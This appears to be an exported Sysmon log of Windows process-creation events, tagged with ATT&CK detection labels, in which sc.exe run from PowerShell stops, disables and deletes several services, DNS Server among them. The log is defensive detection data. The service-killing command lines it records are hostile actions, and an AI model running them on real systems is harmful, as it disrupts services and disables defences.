+ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Serhiez",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:59.226763700Z"",""eventRecordID"":""3013"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:59.207\r\nProcessGuid: {df9fc3d3-b3b3-5ecf-0000-00100dad2600}\r\nProcessId: 7360\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Serhiez\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:59.207"",""processGuid"":""{df9fc3d3-b3b3-5ecf-0000-00100dad2600}"",""processId"":""7360"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Serhiez"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:27.527",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:59.142 +ProcessGuid: {df9fc3d3-b3b3-5ecf-0000-001007ac2600} +ProcessId: 7872 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Serhiez +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Serhiez",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:59.145011700Z"",""eventRecordID"":""3012"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:59.142\r\nProcessGuid: {df9fc3d3-b3b3-5ecf-0000-001007ac2600}\r\nProcessId: 7872\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Serhiez\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:59.142"",""processGuid"":""{df9fc3d3-b3b3-5ecf-0000-001007ac2600}"",""processId"":""7872"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Serhiez"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:27.473",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:59.085 +ProcessGuid: {df9fc3d3-b3b3-5ecf-0000-00103ca92600} +ProcessId: 6948 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""DNS Server"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""DNS Server\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:59.088233500Z"",""eventRecordID"":""3009"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:59.085\r\nProcessGuid: {df9fc3d3-b3b3-5ecf-0000-00103ca92600}\r\nProcessId: 6948\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""DNS Server\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:59.085"",""processGuid"":""{df9fc3d3-b3b3-5ecf-0000-00103ca92600}"",""processId"":""6948"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""DNS Server\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:27.416",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:59.036 +ProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010c8a52600} +ProcessId: 5556 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Zational +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Zational",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:59.039724100Z"",""eventRecordID"":""3006"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:59.036\r\nProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010c8a52600}\r\nProcessId: 5556\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Zational\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:59.036"",""processGuid"":""{df9fc3d3-b3b3-5ecf-0000-0010c8a52600}"",""processId"":""5556"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Zational"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:27.401",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:59.022 +ProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010e9a42600} +ProcessId: 7592 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Zational Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Zational Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:59.025343000Z"",""eventRecordID"":""3005"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:59.022\r\nProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010e9a42600}\r\nProcessId: 7592\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Zational Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:59.022"",""processGuid"":""{df9fc3d3-b3b3-5ecf-0000-0010e9a42600}"",""processId"":""7592"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Zational Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:27.354",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:58.995 +ProcessGuid: {df9fc3d3-b3b2-5ecf-0000-0010a2a22600} +ProcessId: 7364 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop AxInstSV +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop AxInstSV",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:58.998632500Z"",""eventRecordID"":""3003"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:58.995\r\nProcessGuid: {df9fc3d3-b3b2-5ecf-0000-0010a2a22600}\r\nProcessId: 7364\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop AxInstSV\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:58.995"",""processGuid"":""{df9fc3d3-b3b2-5ecf-0000-0010a2a22600}"",""processId"":""7364"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop AxInstSV"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:27.311",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:58.945 +ProcessGuid: {df9fc3d3-b3b2-5ecf-0000-0010f59e2600} +ProcessId: 7744 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop clr_optimization +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop clr_optimization",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:58.948329000Z"",""eventRecordID"":""3000"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:58.945\r\nProcessGuid: {df9fc3d3-b3b2-5ecf-0000-0010f59e2600}\r\nProcessId: 7744\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: 